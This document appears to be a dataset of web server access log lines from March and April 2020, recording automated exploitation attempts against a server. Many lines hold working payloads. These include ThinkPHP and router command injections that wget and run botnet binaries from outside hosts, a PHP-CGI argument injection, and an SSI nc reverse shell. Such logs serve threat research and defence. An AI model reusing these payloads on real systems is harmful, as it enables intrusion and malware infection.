text
stringlengths
92
2.08k
5.101.0.209 - - [25/Mar/2020:02:53:31 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.57.40.38 - - [25/Mar/2020:03:45:58 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
222.186.19.221 - - [25/Mar/2020:12:58:13 +0900] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-"
222.186.19.221 - - [25/Mar/2020:13:29:00 +0900] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-"
5.188.210.101 - - [25/Mar/2020:15:04:43 +0900] "GET http://5.188.210.101/echo.php HTTP/1.1" 404 4339 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
42.227.184.233 - - [25/Mar/2020:16:40:22 +0900] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.227.184.233:38642/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 12830 "-" "-"
123.207.210.64 - - [25/Mar/2020:20:14:10 +0900] "GET //phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.1" 404 4339 "-" "-"
123.207.210.64 - - [25/Mar/2020:20:14:19 +0900] "GET //phpMyAdmin-3.1.0.0-english/scripts/setup.php HTTP/1.1" 404 4339 "-" "-"
123.207.210.64 - - [25/Mar/2020:20:14:30 +0900] "GET //phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.1" 404 4339 "-" "-"
123.207.210.64 - - [25/Mar/2020:20:14:37 +0900] "GET //phpMyAdmin-3.1.0.0-english/scripts/setup.php HTTP/1.1" 404 4339 "-" "-"
123.207.210.64 - - [25/Mar/2020:20:14:42 +0900] "GET //phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php HTTP/1.1" 404 4339 "-" "-"
123.207.210.64 - - [25/Mar/2020:20:14:44 +0900] "GET //phpMyAdmin-3.1.2.0-english/scripts/setup.php HTTP/1.1" 404 4339 "-" "-"
5.101.0.209 - - [25/Mar/2020:23:13:09 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.188.210.101 - - [26/Mar/2020:04:30:58 +0900] "GET http://5.188.210.101/echo.php HTTP/1.1" 400 657 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
110.249.212.46 - - [26/Mar/2020:04:43:22 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [26/Mar/2020:04:43:22 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [26/Mar/2020:04:43:23 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [26/Mar/2020:04:43:23 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [26/Mar/2020:04:43:23 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [26/Mar/2020:04:43:23 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [26/Mar/2020:04:43:23 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [26/Mar/2020:04:43:25 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
5.101.0.209 - - [26/Mar/2020:22:19:02 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.40.240.222 - - [26/Mar/2020:23:14:41 +0900] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
103.40.240.222 - - [26/Mar/2020:23:14:42 +0900] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
103.40.240.222 - - [26/Mar/2020:23:14:43 +0900] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
103.40.240.222 - - [26/Mar/2020:23:14:43 +0900] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
103.40.240.222 - - [26/Mar/2020:23:15:45 +0900] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
103.40.240.222 - - [26/Mar/2020:23:15:45 +0900] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
103.40.240.222 - - [26/Mar/2020:23:15:47 +0900] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
103.40.240.222 - - [26/Mar/2020:23:18:40 +0900] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
114.216.34.108 - - [27/Mar/2020:04:25:29 +0900] "GET /otsmobile/app/mgs/mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B%22train_date%22%3A%2220200401%22%2C%22purpose_codes%22%3A%2200%22%2C%22from_station%22%3A%22SHH%22%2C%22to_station%22%3A%22CNW%22%2C%22station_train_code%22%3A%22%22%2C%22start_time_begin%22%3A%220000%22%2C%22start_time_end%22%3A%222400%22%2C%22train_headers%22%3A%22QB%23%22%2C%22train_flag%22%3A%22%22%2C%22seat_type%22%3A%220%22%2C%22seatBack_Type%22%3A%22%22%2C%22ticket_num%22%3A%22%22%2C%22dfpStr%22%3A%22%22%2C%22baseDTO%22%3A%7B%22check_code%22%3A%228f6ac7e0cfa5a213d90123293e5aca12%22%2C%22device_no%22%3A%22%22%2C%22mobile_no%22%3A%22%22%2C%22os_type%22%3A%22a%22%2C%22time_str%22%3A%2220200327032528%22%2C%22user_name%22%3A%22%22%2C%22version_no%22%3A%224.3.11%22%7D%7D%5D&ts=1585250728562&sign= HTTP/1.1" 404 4339 "-" "Go-http-client/1.1"
49.89.123.90 - - [27/Mar/2020:07:00:53 +0900] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 12830 "-" "Hello, world"
51.254.139.45 - - [27/Mar/2020:11:30:43 +0900] "GET /vendor/phpunit/phpunit/src/Util/PHP/Template/TestCaseMethod.tpl.dist HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.101.0.209 - - [27/Mar/2020:15:37:09 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
47.90.127.57 - - [27/Mar/2020:22:10:35 +0900] "GET /vendor/phpunit/phpunit/src/Util/PHP/Template/TestCaseMethod.tpl.dist HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
2.50.40.165 - - [27/Mar/2020:22:12:38 +0900] "GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://45.148.10.194/arm7;+chmod+777+arm7;+./arm7+rep.arm7 HTTP/1.0" 404 12830 "-" "botnet/2.0"
51.255.170.237 - - [28/Mar/2020:07:08:38 +0900] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://51.77.213.109/x86%20;chmod%20777%20*%20x86;%20cat%20x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp HTTP/1.1" 404 4339 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.12.1.el6.x86_64"
110.249.212.46 - - [28/Mar/2020:07:59:56 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [28/Mar/2020:07:59:56 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [28/Mar/2020:07:59:56 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [28/Mar/2020:07:59:56 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [28/Mar/2020:07:59:56 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [28/Mar/2020:07:59:56 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [28/Mar/2020:07:59:56 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [28/Mar/2020:07:59:56 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
51.255.170.237 - - [28/Mar/2020:09:34:48 +0900] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://51.77.213.109/x86%20;chmod%20777%20*%20x86;%20cat%20x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp HTTP/1.1" 404 4339 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.12.1.el6.x86_64"
51.255.170.237 - - [28/Mar/2020:12:18:15 +0900] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://51.77.213.109/x86%20;chmod%20777%20*%20x86;%20cat%20x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp HTTP/1.1" 404 4339 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.12.1.el6.x86_64"
51.255.170.237 - - [28/Mar/2020:15:15:32 +0900] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://51.77.213.109/x86%20;chmod%20777%20*%20x86;%20cat%20x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp HTTP/1.1" 404 4339 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.12.1.el6.x86_64"
156.231.38.66 - - [28/Mar/2020:21:31:56 +0900] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-"
5.101.0.209 - - [28/Mar/2020:22:17:20 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 400 639 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [29/Mar/2020:03:32:38 +0900] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 400 639 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [29/Mar/2020:03:32:38 +0900] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 400 639 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.231.38.66 - - [29/Mar/2020:09:17:02 +0900] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-"
223.105.4.250 - - [29/Mar/2020:09:26:26 +0900] "GET http://112.35.63.31:8088/index.php HTTP/1.1" 400 657 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.25"
5.101.0.209 - - [29/Mar/2020:10:43:59 +0900] "GET /solr/admin/info/system?wt=json HTTP/1.1" 400 639 "http://218.47.114.42:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [29/Mar/2020:10:49:53 +0900] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 400 639 "http://218.47.114.42:80/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [29/Mar/2020:10:49:54 +0900] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 400 639 "http://218.47.114.42:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [29/Mar/2020:10:53:37 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 400 639 "http://218.47.114.42:80/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [29/Mar/2020:14:48:12 +0900] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 400 639 "http://218.47.114.42:80/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
51.255.170.237 - - [30/Mar/2020:13:56:02 +0900] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://51.178.81.75/x86%20;chmod%20777%20*%20x86;%20cat%20x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp HTTP/1.1" 400 237 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.27.1.el6.x86_64"
5.101.0.209 - - [30/Mar/2020:18:56:25 +0900] "GET /solr/admin/info/system?wt=json HTTP/1.1" 400 639 "http://125.204.61.47:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [30/Mar/2020:19:09:53 +0900] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 400 639 "http://125.204.61.47:80/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [30/Mar/2020:19:09:53 +0900] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 400 639 "http://125.204.61.47:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [30/Mar/2020:19:16:41 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 400 639 "http://125.204.61.47:80/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [31/Mar/2020:06:52:02 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 400 639 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [31/Mar/2020:10:27:49 +0900] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 400 639 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [31/Mar/2020:10:27:49 +0900] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 400 639 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:17:24 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:19:25 +0900] "GET http://110.249.212.46/testget?q=23333&port=443 HTTP/1.1" 400 157 "-" "-"
110.249.212.46 - - [31/Mar/2020:16:19:25 +0900] "GET http://110.249.212.46/testget?q=23333&port=80 HTTP/1.1" 400 157 "-" "-"
64.62.170.22 - - [31/Mar/2020:16:29:31 +0900] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://104.248.236.250/NoIr_x.86 -O /tmp/NoIr_x.86; chmod 777 /tmp/NoIr_x.86; /tmp/NoIr_x.86 NoIr_x.86' HTTP/1.1" 400 157 "-" "NoIr_x.86/2.0"
23.225.172.10 - - [31/Mar/2020:20:37:36 +0900] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-"
5.101.0.209 - - [01/Apr/2020:14:04:19 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
37.49.226.140 - - [02/Apr/2020:02:51:28 +0900] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2037.49.226.140%2029312%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0" 404 12830 "-" "-"
223.105.4.250 - - [02/Apr/2020:08:46:24 +0900] "GET http://112.35.88.28:8088/index.php HTTP/1.1" 400 657 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36"
223.105.4.250 - - [02/Apr/2020:08:46:26 +0900] "GET http://112.35.63.31:8088/index.php HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
37.6.76.7 - - [02/Apr/2020:14:45:53 +0900] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 194.15.36.96/jaws;sh+/tmp/jaws HTTP/1.1" 404 12830 "-" "Hello, world"
121.231.154.86 - admin [02/Apr/2020:19:59:28 +0900] "GET /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr HTTP/1.1" 404 12830 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
23.225.172.10 - - [03/Apr/2020:00:03:19 +0900] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-"
5.101.0.209 - - [03/Apr/2020:07:02:07 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 4339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
175.29.124.100 - - [03/Apr/2020:10:23:39 +0900] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 157 "-" "-"
92.98.178.67 - - [03/Apr/2020:16:43:00 +0900] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 157 "-" "-"
23.225.172.10 - - [03/Apr/2020:23:48:07 +0900] "CONNECT ip.ws.126.net:443 HTTP/1.1" 400 157 "-" "-"
